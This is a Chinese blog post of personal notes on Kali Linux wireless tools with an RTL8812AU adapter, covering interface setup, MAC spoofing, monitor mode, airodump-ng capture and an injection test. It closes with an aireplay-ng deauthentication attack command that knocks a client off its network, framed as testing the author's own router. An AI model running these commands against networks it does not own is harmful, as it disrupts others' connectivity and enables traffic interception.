参看前文,我使用的是RTL8812AU网卡,这块网卡从2017 kali.1 开始提供支持,应该算是块小神卡.
#打开无线网卡电源
iwconfig wlan0 txpower on
#列出区域内的无线网络SSID
iwlist wlan0 scan
#链接到某个网络
iwconfig wlan0 essid "YOURESSID" key "YOURPASSWORD"
#查看各种参数
iwconfig wlan0
#关闭或者启动网卡
iwconfig wlan0 up/down
#DHCP 获取
dhclient wlan0
#ubuntu/kali 无线网卡网卡配置静态IP地址
#---------------------------------------
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 192.168.1.11
netmask 255.255.255.0
auto wlan0
iface wlan0 inet static
address 192.168.0.104
netmask 255.255.255.0
gateway 192.168.0.1
#pre-up ip link set wlan0 up
#pre-up iwconfig wlan0 essid ssid
wpa-ssid 18102XX #SSID
wpa-psk PASSWORD #PASSWORD
#----------------------------------------------
#iwconfig 命令用来查看或者配置无线网卡的各种参数
iwconfig
ifconfig wlan1 down
#change mac address
macchanger --help
macchanger -s [--show]
macchanger --random wlan1
ifconfig wlan1 up
#monitor mode use airmon-ng, did not work for me with my RTL8812AU.
airmon-ng start wlan1
airmon-ng stop mon0
#config monitor mode manually
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
#check the monitor mode
iwconfig
#kill wpa_supplicant
airmon-ng check kill
#start to sniff on wireless lan
airodump-ng wlan1
BSSID: AP MAC address.
PWR: power, the distance
Beacons: Beacons is the routers send.
#Data: useful data sniffed
#/s:
CH: channel number
MB:
ENC: encryption
CIPHER: cracking method.
AUTH: Authentication, PSK: Pre-shared-key
ESSID: AP SSID.
#write to a file, then use wireshark to analyze it.
airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface]
eg:
airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
#Test wireless Device Packet Injection
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
#my output is below
wlan1 is on channel 7, but the AP uses channel 2
#或者碰到 No such BSSID available.要修改wlan1的监听信道
iwconfig wlan1 channel 2
iwlist wlan1 channel
#再次执行,看到下面的100%意味着injection测试成功
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
18:47:18 Ping (min/avg/max): 2.335ms/3.755ms/10.565ms Power: -40.13
18:47:18 30/30: 100%
#dump my own router ,create 4 files.
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX --write out wlan1
STATION: all the MAC address below STATION means these are all clients
#ls out*
out-01.cap out-01.csv out-01.kismet.csv out-01.kismet.netxml
#Deauthentication Attacks Theory
This attack is used to disconnect any device from any network within our range even
if the network if protected with a key.
Hacker sends Deauthentication packets to the router pretending to be the target
maching(by spoofing its MAC address)
At the same time, the hacker sends packets to the target machine(pretending to be the router)
telling it that it needs re-authentication itself.
#First get the clients connect to it
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX wlan1
#Deauthentication attacks ,将会使MAC地址为-c "00:1E:XX:XX:XX:XX"的机器一直连不上.
aireplay-ng --deauth [number of deauth packets] -a [AP-MAC] -c[target-MAC] [interface]
aireplay-ng --deauth 100 -a "14:D6:XX:XX:XX:XX" -c "00:1E:XX:XX:XX:XX" wlan1
阅读(2183) | 评论(0) | 转发(0) |